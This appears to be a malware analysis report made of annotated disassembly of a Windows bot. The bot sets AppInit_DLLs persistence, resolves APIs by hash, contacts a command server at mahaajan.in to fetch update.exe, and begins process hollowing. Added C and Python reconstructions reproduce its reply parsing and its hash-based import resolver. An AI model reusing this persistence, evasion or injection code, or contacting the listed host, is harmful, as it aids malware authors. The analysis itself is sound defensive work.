004148F7 mov edx, dword ptr [ebp-00000120h]
004148FD push edx
004148FE push 00000000h
00414900 call 00414B10h
00414905 mov dword ptr [ebp-0000011Ch], eax
0041490B cmp dword ptr [ebp-0000011Ch], 00000000h
00414912 jne 0041491Bh
00414914 xor eax, eax
00414916 jmp 004149C4h
0041491B mov eax, dword ptr [ebp-0000011Ch] xrefs 00414912
00414921 push eax
00414922 call 00414B30h
00414927 mov dword ptr [ebp-00000118h], eax
0041492D cmp dword ptr [ebp-00000118h], 00000000h
00414934 jne 0041493Dh
00414936 xor eax, eax
00414938 jmp 004149C4h
0041493D call 00414B80h xrefs 00414934
00414942 test eax, eax
00414944 je 00414973h
00414946 lea ecx, dword ptr [ebp-00000130h]
0041494C push ecx
0041494F push 00000000h Count = 2
00414951 push 00414DC0h
00414958 push 00000000h Count = 2
0041495A call 00414B50h
0041495F mov dword ptr [ebp-0000012Ch], eax
00414965 push FFFFFFFFh
00414967 mov edx, dword ptr [ebp-0000012Ch]
0041496D push edx
0041496E call 00414590h
00414977 push 00000000h Count = 3
00414979 push 00413ED0h
00414980 push 00000000h Count = 2
00414982 call 00414B50h
0041498B push 00000000h Count = 3
0041498D push 004153C0h
00414994 push 00000000h Count = 2
00414996 call 00414B50h
0041499B push 00000007h
0041499D push 00000000h
0041499F mov eax, dword ptr [ebp-04h]
004149A2 push eax
004149A3 mov ecx, dword ptr [ebp-00000118h]
004149A9 push ecx
004149AA call 004146A0h
004149AF add esp, 10h
004149B2 push eax
004149B3 lea edx, dword ptr [ebp-00000110h]
004149B9 push edx
004149BA call 00414290h
004149BF add esp, 08h
004149C2 xor eax, eax
004149C4 mov esp, ebp xrefs 00414938, 00414916, 004148E1
004149C6 pop ebp
004149C7 retn 0010h function end
APIs
  • ExitProcess.KERNEL32, ref: 0041632D
Address Instruction Meta Information
004162FF call 0041635Bh xrefs 004161EA
00416304 push 00000000h
00416306 push 00401090h
0041630B push 0040108Ch
00416310 call 00416334h
00416315 push 00000000h
00416317 push 00401098h
0041631C push 00401094h
00416321 call 00416334h
00416326 add esp, 18h
00416329 push dword ptr [esp+04h]
0041632D call dword ptr [0040101Ch] ExitProcess@KERNEL32.DLL (Import)
00416333 int3
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • RegCloseKey.ADVAPI32, ref: 004137A6
Address Instruction Meta Information
00413790 push ebp xrefs 00413555, 00413529, 00413543, 004147CA, 004135DD
00413791 mov ebp, esp
00413793 mov eax, dword ptr [ebp+08h]
00413796 push eax
00413797 push 647832FCh
0041379C push DB355534h
004137A1 call 00415E40h
004137A6 call eax RegCloseKey@ADVAPI32.DLL (Hidden Import)
004137A8 pop ebp
004137A9 retn 0004h function end
Strings
  • mssys.dll, va: 00411C10
  • %WINDIR%, va: 00411C1C
  • %s%s, va: 00411C28
  • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\, va: 00411C30
  • AppInit_DLLs, va: 00411C68
Address Instruction Meta Information
004146E0 push ebp xrefs 004148AA
004146E1 mov ebp, esp
004146E3 sub esp, 00000114h
004146E9 push 00411C10h ASCII "mssys.dll"
004146EE push 00411C1Ch ASCII "%WINDIR%"
004146F3 call 004145B0h
004146F8 add esp, 04h
004146FB push eax
004146FC push 00411C28h ASCII "%s%s"
00414701 lea eax, dword ptr [ebp-00000108h]
00414707 push eax
00414708 call 004141C0h
0041470D add esp, 10h
00414710 lea ecx, dword ptr [ebp-00000108h]
00414716 push ecx
00414717 call 004137E0h
0041471C neg eax
0041471E sbb eax, eax
00414720 add eax, 01h
00414723 cmp eax, FFFFFFFFh
00414726 je 00414768h
00414728 push 00000000h
0041472A push 00000004h
0041472C push 00000001h
00414730 push 00000000h Count = 2
00414732 push 40000000h
00414737 lea edx, dword ptr [ebp-00000108h]
0041473D push edx
0041473E call 00413F90h
00414743 mov dword ptr [ebp-00000114h], eax
00414749 push 00000000h
0041474B lea eax, dword ptr [ebp-00000110h]
00414751 push eax
00414752 push 00010600h
00414757 push 00401320h
0041475C mov ecx, dword ptr [ebp-00000114h]
00414762 push ecx
00414763 call 00413FF0h
00414768 mov dword ptr [ebp-0000010Ch], 00000000h xrefs 00414726
00414772 push 00000000h
00414774 lea edx, dword ptr [ebp-0000010Ch]
0041477A push edx
0041477B push 00000000h
0041477D push 000F003Fh
00414786 push 00000000h Count = 3
00414788 push 00411C30h ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\"
0041478D push 80000002h
00414792 call 00414A30h
00414797 lea eax, dword ptr [ebp-00000108h]
0041479D push eax
0041479E call 00415EDCh
004147A3 add esp, 04h
004147A6 push eax
004147A7 lea ecx, dword ptr [ebp-00000108h]
004147AD push ecx
004147AE push 00000001h
004147B0 push 00000000h
004147B2 push 00411C68h ASCII "AppInit_DLLs"
004147B7 mov edx, dword ptr [ebp-0000010Ch]
004147BD push edx
004147BE call 00414A70h
004147C3 mov eax, dword ptr [ebp-0000010Ch]
004147C9 push eax
004147CA call 00413790h
004147CF mov esp, ebp
004147D1 pop ebp
004147D2 ret function end
APIs
  • HeapFree.KERNEL32, ref: 004162F8
Address Instruction Meta Information
004162EC push dword ptr [esp+04h] xrefs 00416242, 004160FD
004162F0 push 00000000h
004162F2 push dword ptr [00418CE0h]
004162F8 call dword ptr [00401008h] HeapFree@KERNEL32.DLL (Import)
004162FE ret function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • RegCreateKeyExA.ADVAPI32, ref: 00414A66
Address Instruction Meta Information
00414A30 push ebp xrefs 00414792
00414A31 mov ebp, esp
00414A33 mov eax, dword ptr [ebp+28h]
00414A36 push eax
00414A37 mov ecx, dword ptr [ebp+24h]
00414A3A push ecx
00414A3B mov edx, dword ptr [ebp+20h]
00414A3E push edx
00414A3F mov eax, dword ptr [ebp+1Ch]
00414A42 push eax
00414A43 mov ecx, dword ptr [ebp+18h]
00414A46 push ecx
00414A47 mov edx, dword ptr [ebp+14h]
00414A4A push edx
00414A4B mov eax, dword ptr [ebp+10h]
00414A4E push eax
00414A4F mov ecx, dword ptr [ebp+0Ch]
00414A52 push ecx
00414A53 mov edx, dword ptr [ebp+08h]
00414A56 push edx
00414A57 push 647832FCh
00414A5C push 90A097E6h
00414A61 call 00415E40h
00414A66 call eax RegCreateKeyExA@ADVAPI32.DLL (Hidden Import)
00414A68 pop ebp
00414A69 retn 0024h function end
APIs
    • WSAStartup.WS2_32, ref: 00414BB5
    • WSASocketA.WS2_32, ref: 00414BC7
    • WSACleanup.WS2_32, ref: 00414BDC
    • gethostbyname.WS2_32, ref: 00414BEE
    • WSACleanup.WS2_32, ref: 00414C03
    • htons.WS2_32, ref: 00414C10
    • inet_ntoa.WS2_32, ref: 00414C37
    • inet_addr.WS2_32, ref: 00414C3E
    • WSAConnect.WS2_32, ref: 00414C62
    • WSACleanup.WS2_32, ref: 00414C6D
  • send.WS2_32, ref: 00414E28
  • recv.WS2_32, ref: 00414E50
Strings
  • http://mahaajan.in/dd/, va: 00401118
  • %s %s, va: 00411BCC
  • http://%s%sdata/update.exe, va: 00411BD4
Address Instruction Meta Information
00414DC0 push ebp
00414DC1 mov ebp, esp
00414DC3 mov eax, 00001728h
00414DC8 call 004163B4h
00414DCD call 00414C90h
00414DD2 mov dword ptr [ebp-04h], eax
00414DD5 push 00000400h
00414DDA push 00000000h
00414DDC lea eax, dword ptr [ebp-00000408h]
00414DE2 push eax
00414DE3 call 00415F8Fh
00414DE8 add esp, 0Ch
00414DEB push 00401118h ASCII "http://mahaajan.in/dd/"
00414DF0 call 00414BA0h
00414DF5 add esp, 04h
00414DF8 mov dword ptr [ebp-00000410h], eax
00414DFE cmp dword ptr [ebp-00000410h], FFFFFFFFh
00414E05 jne 00414E0Eh
00414E07 xor eax, eax
00414E09 jmp 00414FD8h
00414E0E push 00000000h xrefs 00414E05
00414E10 mov ecx, dword ptr [ebp-04h]
00414E13 push ecx
00414E14 call 00415EDCh
00414E19 add esp, 04h
00414E1C push eax
00414E1D mov edx, dword ptr [ebp-04h]
00414E20 push edx
00414E21 mov eax, dword ptr [ebp-00000410h]
00414E27 push eax
00414E28 call dword ptr [00401064h] send@WS2_32.DLL (Import)
00414E2E push 00000000h xrefs 00414EFC
00414E30 push 00000001h
00414E32 lea ecx, dword ptr [ebp-00000408h]
00414E38 push ecx
00414E39 call 00415EDCh
00414E3E add esp, 04h
00414E41 lea edx, dword ptr [ebp+eax-00000408h]
00414E48 push edx
00414E49 mov eax, dword ptr [ebp-00000410h]
00414E4F push eax
00414E50 call dword ptr [0040105Ch] recv@WS2_32.DLL (Import)
00414E56 mov dword ptr [ebp-00000614h], eax
00414E5C cmp dword ptr [ebp-00000614h], 00000000h
00414E63 je 00414F01h
00414E69 mov dword ptr [ebp-00000618h], 00000000h
00414E73 jmp 00414E84h
00414E75 mov ecx, dword ptr [ebp-00000618h] xrefs 00414EF7
00414E7B add ecx, 01h
00414E7E mov dword ptr [ebp-00000618h], ecx
00414E84 mov edx, dword ptr [ebp-00000618h] xrefs 00414E73
00414E8A movsx eax, byte ptr [ebp+edx-00000408h]
00414E92 test eax, eax
00414E94 je 00414EFCh
00414E96 mov ecx, dword ptr [ebp-00000618h]
00414E9C movsx edx, byte ptr [ebp+ecx-00000408h]
00414EA4 cmp edx, 0Dh
00414EA7 jne 00414EF7h
00414EA9 mov eax, dword ptr [ebp-00000618h]
00414EAF movsx ecx, byte ptr [ebp+eax-00000407h]
00414EB7 cmp ecx, 0Ah
00414EBA jne 00414EF7h
00414EBC mov edx, dword ptr [ebp-00000618h]
00414EC2 movsx eax, byte ptr [ebp+edx-00000406h]
00414ECA cmp eax, 0Dh
00414ECD jne 00414EF7h
00414ECF mov ecx, dword ptr [ebp-00000618h]
00414ED5 movsx edx, byte ptr [ebp+ecx-00000405h]
00414EDD cmp edx, 0Ah
00414EE0 jne 00414EF7h
00414EE2 mov eax, dword ptr [ebp-00000618h]
00414EE8 lea ecx, dword ptr [ebp+eax-00000404h]
00414EEF mov dword ptr [ebp-0000040Ch], ecx
00414EF5 jmp 00414EFCh
00414EF7 jmp 00414E75h xrefs 00414EA7, 00414EBA, 00414ECD, 00414EE0
00414EFC jmp 00414E2Eh xrefs 00414E94, 00414EF5
00414F01 push 00411BC4h xrefs 00414E63
00414F06 mov edx, dword ptr [ebp-0000040Ch]
00414F0C push edx
00414F0D call 00416027h
00414F12 add esp, 08h
00414F15 mov dword ptr [ebp-00000610h], eax
00414F1B mov dword ptr [ebp-0000161Ch], 00000001h
00414F25 jmp 00414F36h
00414F27 mov eax, dword ptr [ebp-0000161Ch] xrefs 00414F5B
00414F2D add eax, 01h
00414F30 mov dword ptr [ebp-0000161Ch], eax
00414F36 cmp dword ptr [ebp-0000161Ch], 04h xrefs 00414F25
00414F3D jnc 00414F5Dh
00414F3F push 00411BC8h
00414F44 push 00000000h
00414F46 call 00416027h
00414F4B add esp, 08h
00414F4E mov ecx, dword ptr [ebp-0000161Ch]
00414F54 mov dword ptr [ebp+ecx*4-00000610h], eax
00414F5B jmp 00414F27h
00414F5D mov edx, dword ptr [ebp-0000060Ch] xrefs 00414F3D
00414F63 push edx
00414F64 mov eax, dword ptr [ebp-00000610h]
00414F6A push eax
00414F6B push 00411BCCh ASCII "%s %s"
00414F70 lea ecx, dword ptr [ebp-00001618h]
00414F76 push ecx
00414F77 call 004141C0h
00414F7C add esp, 10h
00414F7F lea edx, dword ptr [ebp-00001618h]
00414F85 push edx
00414F86 call 00414CC0h
00414F8B add esp, 04h
00414F8E movzx eax, al
00414F91 test eax, eax
00414F93 jne 00414FD6h
00414F95 push 00401118h ASCII "http://mahaajan.in/dd/"
00414F9A push 00411BD4h ASCII "http://%s%sdata/update.exe"
00414F9F lea ecx, dword ptr [ebp-00001728h]
00414FA5 push ecx
00414FA6 call 004141C0h
00414FAB add esp, 0Ch
00414FB0 push 00000000h Count = 2
00414FB2 lea edx, dword ptr [ebp-00001728h]
00414FB8 push edx
00414FB9 push 00000000h
00414FBB call 00415030h
00414FC0 lea eax, dword ptr [ebp-00001728h]
00414FC6 push eax
00414FC7 call 00415120h
00414FCC add esp, 04h
00414FCF push 00000000h
00414FD1 call 00414AA0h
00414FD6 xor eax, eax xrefs 00414F93
00414FD8 mov esp, ebp xrefs 00414E09
00414FDA pop ebp
00414FDB retn 0004h function end
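The listing at 00414DC0 shows how the bot consumes the reply from http://mahaajan.in/dd/: the loop at 00414E2E calls recv for one byte at a time into the 0x400-byte buffer zeroed at 00414DD5 (destination is buf + strlen(buf), and the loop only ends when recv returns 0), the scan at 00414E84 looks for the "\r\n\r\n" separator and records the body pointer at [ebp-40Ch], and the calls to 00416027 at 00414F0D and 00414F46 (first with the body, then three times with NULL, which is the strtok calling pattern) collect up to four tokens that are joined as "%s %s" for 00414CC0. No comparison against the 0x400-byte buffer size is visible in that loop. The following is an added example written for this report, not the sample's code and not taken from the page: the same header/body split and tokenisation in portable C, with the byte append bounded by the buffer size. The delimiter strings at 00411BC4 and 00411BC8 are not on the page, so whitespace is assumed; the HTTP reply is constructed for the demo.

```c
#include <stdio.h>
#include <string.h>

#define RESP_CAP 0x400   /* the sample zeroes a 0x400-byte buffer at [ebp-408h] (00414DD5) */

/* Constructed sample reply for the demo; not traffic from the page. */
const char DEMO_RESPONSE[] =
    "HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\nupdate now extra1 extra2 extra3\r\n";

/* Store one received byte at the current string end, as the recv(sock, buf+strlen(buf), 1, 0)
   loop at 00414E2E does, but refuse once the buffer is full. buf must start NUL-terminated. */
int append_byte(char *buf, size_t cap, char c) {
    size_t n = strlen(buf);
    if (n + 1 >= cap) return 0;          /* keep room for the terminator */
    buf[n] = c;
    buf[n + 1] = '\0';
    return 1;
}

/* Feed src byte by byte through append_byte; returns how many bytes were accepted. */
size_t feed_bytes(const char *src, char *buf, size_t cap) {
    size_t accepted = 0;
    for (; *src; src++, accepted++)
        if (!append_byte(buf, cap, *src)) break;
    return accepted;
}

/* Offset of the first body byte (after "\r\n\r\n"), or -1 if the separator is absent.
   The scan at 00414E84 compares bytes i..i+3 until it meets a NUL; this one is bounded by len. */
long http_body_offset(const char *buf, size_t len) {
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(buf + i, "\r\n\r\n", 4) == 0) return (long)i + 4;
    return -1;
}

/* Body of the constructed reply, or NULL if it has no separator. */
const char *demo_body(void) {
    long off = http_body_offset(DEMO_RESPONSE, strlen(DEMO_RESPONSE));
    return off < 0 ? NULL : DEMO_RESPONSE + off;
}

/* Split the body into at most four tokens (the sample keeps four pointers at [ebp-610h]..[ebp-604h])
   and format the first two as "%s %s". ASSUMPTION: whitespace delimiters; the delimiter
   strings at 00411BC4 / 00411BC8 are not on the page. Returns the token count, 0 on failure. */
int build_command(const char *body, char *out, size_t outcap) {
    char tmp[RESP_CAP];
    char *tok[4] = {0};
    int n = 0;
    snprintf(tmp, sizeof tmp, "%s", body);
    for (char *p = strtok(tmp, " \t\r\n"); p && n < 4; p = strtok(NULL, " \t\r\n")) tok[n++] = p;
    if (n < 2) return 0;
    snprintf(out, outcap, "%s %s", tok[0], tok[1]);
    return n;
}

int main(void) {
    char buf[RESP_CAP] = "", cmd[64];
    feed_bytes(DEMO_RESPONSE, buf, sizeof buf);     /* arrives one byte per recv, as in the bot */
    long off = http_body_offset(buf, strlen(buf));
    if (off >= 0 && build_command(buf + off, cmd, sizeof cmd))
        printf("body at offset %ld, command \"%s\"\n", off, cmd);
    return 0;
}
```

A caller that keeps the bot's own loop shape should also stop when recv returns a negative value; the listing only tests for 0 at 00414E5C, so a socket error keeps the loop running.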
APIs
    • HeapFree.KERNEL32, ref: 004162F8
  • CloseHandle.KERNEL32, ref: 0041610D
Address Instruction Meta Information
004160F5 mov eax, dword ptr [esp+04h] xrefs 004155D9, 00415496
004160F9 push esi
004160FA mov esi, dword ptr [eax]
004160FC push eax
004160FD call 004162ECh
00416102 cmp esi, FFFFFFFFh
00416105 pop ecx
00416106 jne 0041610Ch
00416108 xor eax, eax
0041610A pop esi
0041610B ret function end
0041610C push esi xrefs 00416106
0041610D call dword ptr [00401004h] CloseHandle@KERNEL32.DLL (Import)
00416113 neg eax
00416115 sbb eax, eax
00416117 neg eax
00416119 dec eax
0041611A pop esi
0041611B ret function end
APIs
  • LoadLibraryA.KERNEL32, ref: 004158E6
Address Instruction Meta Information
00415760 push ebp xrefs 00415D37, 00415925, 00415E2B
00415761 mov ebp, esp
00415763 sub esp, 00000130h
00415769 mov eax, dword ptr [ebp+08h]
0041576C mov ecx, dword ptr [eax+3Ch]
0041576F mov edx, dword ptr [ebp+08h]
00415772 lea eax, dword ptr [edx+ecx+18h]
00415776 mov dword ptr [ebp-14h], eax
00415779 mov ecx, dword ptr [ebp-14h]
0041577C mov edx, dword ptr [ebp+08h]
0041577F add edx, dword ptr [ecx+60h]
00415782 mov dword ptr [ebp-10h], edx
00415785 mov dword ptr [ebp-08h], 00000000h
0041578C cmp dword ptr [ebp+10h], 00000000h
00415790 je 004157E5h
00415792 mov eax, dword ptr [ebp+10h]
00415795 movsx ecx, byte ptr [eax]
00415798 cmp ecx, 23h
0041579B jne 004157E5h
0041579D mov edx, dword ptr [ebp+10h] xrefs 004157C9
004157A0 add edx, 01h
004157A3 mov dword ptr [ebp+10h], edx
004157A6 mov eax, dword ptr [ebp+10h]
004157A9 movsx ecx, byte ptr [eax]
004157AC test ecx, ecx
004157AE je 004157CBh
004157B0 mov edx, dword ptr [ebp-08h]
004157B3 imul edx, edx, 0Ah
004157B6 mov dword ptr [ebp-08h], edx
004157B9 mov eax, dword ptr [ebp+10h]
004157BC movsx ecx, byte ptr [eax]
004157BF mov edx, dword ptr [ebp-08h]
004157C2 lea eax, dword ptr [edx+ecx-30h]
004157C6 mov dword ptr [ebp-08h], eax
004157C9 jmp 0041579Dh
004157CB mov ecx, dword ptr [ebp-10h] xrefs 004157AE
004157CE mov edx, dword ptr [ebp-08h]
004157D1 sub edx, dword ptr [ecx+10h]
004157D4 mov dword ptr [ebp-08h], edx
004157D7 mov eax, dword ptr [ebp-10h]
004157DA mov ecx, dword ptr [ebp-08h]
004157DD cmp ecx, dword ptr [eax+14h]
004157E0 jc 004157E3h
004157E2 int3
004157E3 jmp 00415851h xrefs 004157E0
004157E5 mov edx, dword ptr [ebp-10h] xrefs 00415790, 0041579B
004157E8 mov eax, dword ptr [ebp+08h]
004157EB add eax, dword ptr [edx+20h]
004157EE mov dword ptr [ebp-24h], eax
004157F1 mov ecx, dword ptr [ebp-10h]
004157F4 mov edx, dword ptr [ebp+08h]
004157F7 add edx, dword ptr [ecx+24h]
004157FA mov dword ptr [ebp-20h], edx
004157FD mov dword ptr [ebp-1Ch], 00000000h
00415804 jmp 0041580Fh
00415806 mov eax, dword ptr [ebp-1Ch] xrefs 00415843
00415809 add eax, 01h
0041580C mov dword ptr [ebp-1Ch], eax
0041580F mov ecx, dword ptr [ebp-10h] xrefs 00415804
00415812 mov edx, dword ptr [ebp-1Ch]
00415815 cmp edx, dword ptr [ecx+18h]
00415818 jnc 00415845h
0041581A mov eax, dword ptr [ebp-1Ch]
0041581D mov ecx, dword ptr [ebp-24h]
00415820 mov edx, dword ptr [ebp+08h]
00415823 add edx, dword ptr [ecx+eax*4]
00415826 push edx
00415827 call 00415710h
0041582C add esp, 04h
0041582F cmp eax, dword ptr [ebp+0Ch]
00415832 jne 00415843h
00415834 mov eax, dword ptr [ebp-1Ch]
00415837 mov ecx, dword ptr [ebp-20h]
0041583A movzx edx, word ptr [ecx+eax*2]
0041583E mov dword ptr [ebp-08h], edx
00415841 jmp 00415845h
00415843 jmp 00415806h xrefs 00415832
00415845 mov eax, dword ptr [ebp-10h] xrefs 00415818, 00415841
00415848 mov ecx, dword ptr [ebp-1Ch]
0041584B cmp ecx, dword ptr [eax+18h]
0041584E jne 00415851h
00415850 int3
00415851 mov edx, dword ptr [ebp-10h] xrefs 0041584E, 004157E3
00415854 mov eax, dword ptr [ebp+08h]
00415857 add eax, dword ptr [edx+1Ch]
0041585A mov dword ptr [ebp-18h], eax
0041585D mov ecx, dword ptr [ebp-08h]
00415860 mov edx, dword ptr [ebp-18h]
00415863 mov eax, dword ptr [ebp+08h]
00415866 add eax, dword ptr [edx+ecx*4]
00415869 mov dword ptr [ebp-0Ch], eax
0041586C mov ecx, dword ptr [ebp-0Ch]
0041586F cmp ecx, dword ptr [ebp+08h]
00415872 jne 00415875h
00415874 int3
00415875 mov edx, dword ptr [ebp-14h] xrefs 00415872
00415878 mov eax, dword ptr [edx+64h]
0041587B mov dword ptr [ebp-04h], eax
0041587E mov ecx, dword ptr [ebp-0Ch]
00415881 cmp ecx, dword ptr [ebp-10h]
00415884 jc 0041592Fh
0041588A mov edx, dword ptr [ebp-10h]
0041588D add edx, dword ptr [ebp-04h]
00415890 cmp dword ptr [ebp-0Ch], edx
00415893 jnc 0041592Fh
00415899 mov eax, dword ptr [ebp-0Ch]
0041589C mov dword ptr [ebp+10h], eax
0041589F mov dword ptr [ebp-28h], 00000000h
004158A6 mov ecx, dword ptr [ebp+10h] xrefs 004158D2
004158A9 movsx edx, byte ptr [ecx]
004158AC cmp edx, 2Eh
004158AF je 004158D4h
004158B1 mov eax, dword ptr [ebp-28h]
004158B4 mov ecx, dword ptr [ebp+10h]
004158B7 mov dl, byte ptr [ecx]
004158B9 mov byte ptr [ebp+eax-00000130h], dl
004158C0 mov eax, dword ptr [ebp-28h]
004158C3 add eax, 01h
004158C6 mov dword ptr [ebp-28h], eax
004158C9 mov ecx, dword ptr [ebp+10h]
004158CC add ecx, 01h
004158CF mov dword ptr [ebp+10h], ecx
004158D2 jmp 004158A6h
004158D4 mov edx, dword ptr [ebp-28h] xrefs 004158AF
004158D7 mov byte ptr [ebp+edx-00000130h], 00000000h
004158DF lea eax, dword ptr [ebp-00000130h]
004158E5 push eax
004158E6 call dword ptr [00418C44h] LoadLibraryA@KERNEL32.DLL (Hidden Import)
004158EC mov dword ptr [ebp+08h], eax
004158EF cmp dword ptr [ebp+08h], 00000000h
004158F3 jne 004158F6h
004158F5 int3
004158F6 mov ecx, dword ptr [ebp+10h] xrefs 004158F3
004158F9 add ecx, 01h
004158FC mov dword ptr [ebp+10h], ecx
004158FF mov edx, dword ptr [ebp+10h]
00415902 movsx eax, byte ptr [edx]
00415905 cmp eax, 23h
00415908 je 00415919h
0041590A mov ecx, dword ptr [ebp+10h]
0041590D push ecx
0041590E call 00415710h
00415913 add esp, 04h
00415916 mov dword ptr [ebp+0Ch], eax
00415919 mov edx, dword ptr [ebp+10h] xrefs 00415908
0041591C push edx
0041591D mov eax, dword ptr [ebp+0Ch]
00415920 push eax
00415921 mov ecx, dword ptr [ebp+08h]
00415924 push ecx
00415925 call 00415760h
0041592A add esp, 0Ch
0041592D jmp 00415932h
0041592F mov eax, dword ptr [ebp-0Ch] xrefs 00415884, 00415893
00415932 mov esp, ebp xrefs 0041592D
00415934 pop ebp
00415935 ret function end
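The routine above is a hash-based export resolver with forwarder handling, which is how the "Hidden Import" calls in this listing are reached without an import table. It walks AddressOfNames until 00415710(name) equals the requested hash ([ebp+0Ch]), maps that index through AddressOfNameOrdinals (word ptr [ecx+eax*2]) into AddressOfFunctions ([edx+1Ch]), traps with int3 if no name matched or the RVA is zero, and, when the resulting address lies inside the export directory ([ebp-10h] up to [ebp-10h] plus the directory size at [opt+64h]), treats it as a forwarder string: it copies the part before '.', calls LoadLibraryA on it, then resolves the remainder, hashing it unless it starts with '#', and hands it to 00415760. The Python below is an added reconstruction written for this page, not code from the sample or the sandbox; it runs the same walk over constructed export directories. The hash at 00415710 is not in the listing, so a ROR13 stand-in is used; Module, build_module, load_library, the sample export tables and the handling of '#ordinal' forwarders are assumptions of the example.

```python
import struct
from dataclasses import dataclass


@dataclass
class Module:                  # stand-in for a loaded module: image bytes plus its export directory
    name: str
    image: bytes
    exp_rva: int
    exp_size: int


class ResolveError(RuntimeError):
    """Raised where the listed routine executes int3."""


def ror13_hash(name: str) -> int:
    """Stand-in for the hash at 00415710, whose algorithm is not in this listing."""
    h = 0
    for c in name.encode("ascii"):
        h = (((h >> 13) | (h << 19)) + c) & 0xFFFFFFFF
    return h


def _cstr(blob: bytes, off: int) -> str:
    return blob[off:blob.index(b"\0", off)].decode("ascii")


def resolve_export(mod: Module, want: int, hash_fn, load_library, depth: int = 0):
    """Walk mod's export names until hash_fn(name) == want, map through the ordinal
    table, and follow a forwarder if the function RVA lies inside the export directory.
    Returns (module name, RVA); the listing returns module base + RVA."""
    if depth > 8:
        raise ResolveError("forwarder loop")
    img, exp = mod.image, mod.exp_rva
    n_names, fn_rva, names_rva, ords_rva = struct.unpack_from("<IIII", img, exp + 0x18)
    for i in range(n_names):                                       # loop bounded by [ecx+18h]
        if hash_fn(_cstr(img, struct.unpack_from("<I", img, names_rva + 4 * i)[0])) == want:
            ordinal = struct.unpack_from("<H", img, ords_rva + 2 * i)[0]   # word ptr [ecx+eax*2]
            break
    else:
        raise ResolveError("no export matches hash %#x" % want)       # int3 at 00415850
    func_rva = struct.unpack_from("<I", img, fn_rva + 4 * ordinal)[0]  # [edx+ecx*4]
    if func_rva == 0:
        raise ResolveError("null export")                              # int3 at 00415874
    if not exp <= func_rva < exp + mod.exp_size:
        return mod.name, func_rva                                      # ordinary export
    dll, _, target = _cstr(img, func_rva).partition(".")               # forwarder "DLL.Name" / "DLL.#N"
    other = load_library(dll)                                          # LoadLibraryA(dll)
    if other is None:
        raise ResolveError("LoadLibraryA(%r) failed" % dll)            # int3 at 004158F5
    if target.startswith("#"):
        # '#ordinal' forwarders are passed to 00415760 unchanged in the listing; this is assumed
        base, n_funcs, _, fn2 = struct.unpack_from("<IIII", other.image, other.exp_rva + 0x10)
        idx = int(target[1:]) - base
        if not 0 <= idx < n_funcs:
            raise ResolveError("ordinal out of range")
        return other.name, struct.unpack_from("<I", other.image, fn2 + 4 * idx)[0]
    return resolve_export(other, hash_fn(target), hash_fn, load_library, depth + 1)


def build_module(name: str, exports: dict) -> Module:
    """Constructed export directory: values are code RVAs (int) or forwarder strings."""
    img, exp = bytearray(0x2000), 0x1000
    names = sorted(exports)                                            # real name tables are sorted
    n = len(names)
    funcs, nms, ords = exp + 0x28, exp + 0x28 + 4 * n, exp + 0x28 + 8 * n
    cursor = ords + 2 * n

    def put(s: str) -> int:
        nonlocal cursor
        off, data = cursor, s.encode("ascii") + b"\0"
        img[off:off + len(data)] = data
        cursor += len(data)
        return off

    name_rva = put(name)
    for i, nm in enumerate(names):
        val = exports[nm]
        struct.pack_into("<I", img, funcs + 4 * i, put(val) if isinstance(val, str) else val)
        struct.pack_into("<I", img, nms + 4 * i, put(nm))
        struct.pack_into("<H", img, ords + 2 * i, i)
    struct.pack_into("<IIIIII", img, exp + 0x0C, name_rva, 1, n, n, funcs, nms)  # Name, Base=1, counts, tables
    struct.pack_into("<I", img, exp + 0x24, ords)
    return Module(name, bytes(img), exp, cursor - exp)


# constructed modules; kernel32 forwarding GetLastError to ntdll mirrors current Windows builds
MODULES = {"ntdll.dll": build_module("ntdll.dll", {
    "NtUnmapViewOfSection": 0x1900, "RtlAllocateHeap": 0x1700, "RtlGetLastWin32Error": 0x1800})}
MODULES["kernel32.dll"] = build_module("kernel32.dll", {
    "FindClose": 0x1A00,
    "GetLastError": "ntdll.RtlGetLastWin32Error",
    "HeapAlloc": "ntdll.#2",                        # ordinal 2 = RtlAllocateHeap in the table above
})


def load_library(dll: str):
    """LoadLibraryA stand-in: appends .dll when no extension is given, as the real API does."""
    key = dll.lower()
    if "." not in key:
        key += ".dll"
    return MODULES.get(key)
```

A resolver that skips the forwarder check returns a pointer into the export directory's string data and crashes on call; the RtlGetLastWin32Error.NTDLL entry further down this report is the kind of result the forwarder path produces.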
APIs
    • CreateProcessA.KERNEL32, ref: 004144EA
    • VirtualAllocEx.KERNEL32, ref: 00414516
    • WriteProcessMemory.KERNEL32, ref: 00414546
    • SetThreadContext.KERNEL32, ref: 0041456A
    • ResumeThread.KERNEL32, ref: 00414586
  • NtUnmapViewOfSection.NTDLL, ref: 0041430D
Address Instruction Meta Information
00414290 push ebp xrefs 004149BA
00414291 mov ebp, esp
00414293 sub esp, 00000348h
00414299 lea eax, dword ptr [ebp-00000340h]
0041429F push eax
004142A0 call 00414430h
004142A5 push eax
004142A6 call 00414450h
004142AB lea ecx, dword ptr [ebp-58h]
004142AE push ecx
004142AF call 00414470h
004142B4 mov edx, dword ptr [ebp+0Ch]
004142B7 mov dword ptr [ebp-68h], edx
004142BA mov eax, dword ptr [ebp-68h]
004142BD mov dword ptr [ebp-00000344h], eax
004142C3 mov ecx, dword ptr [ebp-00000344h]
004142C9 mov edx, dword ptr [ebp-68h]
004142CC add edx, dword ptr [ecx+3Ch]
004142CF mov dword ptr [ebp-64h], edx
004142D2 mov eax, dword ptr [ebp-64h]
004142D5 mov ecx, dword ptr [eax+34h]
004142D8 mov dword ptr [ebp-5Ch], ecx
004142DB mov edx, dword ptr [ebp-64h]
004142DE mov eax, dword ptr [edx+28h]
004142E1 mov dword ptr [ebp-6Ch], eax
004142E4 lea ecx, dword ptr [ebp-10h]
004142E7 push ecx
004142E8 lea edx, dword ptr [ebp-58h]
004142EB push edx
004142EE push 00000000h Count = 2
004142F0 push 00000024h
004142F6 push 00000000h Count = 3
004142F8 call 00414490h
004142FD push eax
004142FE push 00000000h
00414300 call 004144B0h
00414305 mov eax, dword ptr [ebp-5Ch]
00414308 push eax
00414309 mov ecx, dword ptr [ebp-10h]
0041430C push ecx
0041430D call dword ptr [00401070h] NtUnmapViewOfSection@NTDLL.DLL (Import)
00414313 push 00000004h
00414315 push 00003000h
0041431A mov edx, dword ptr [ebp-64h]
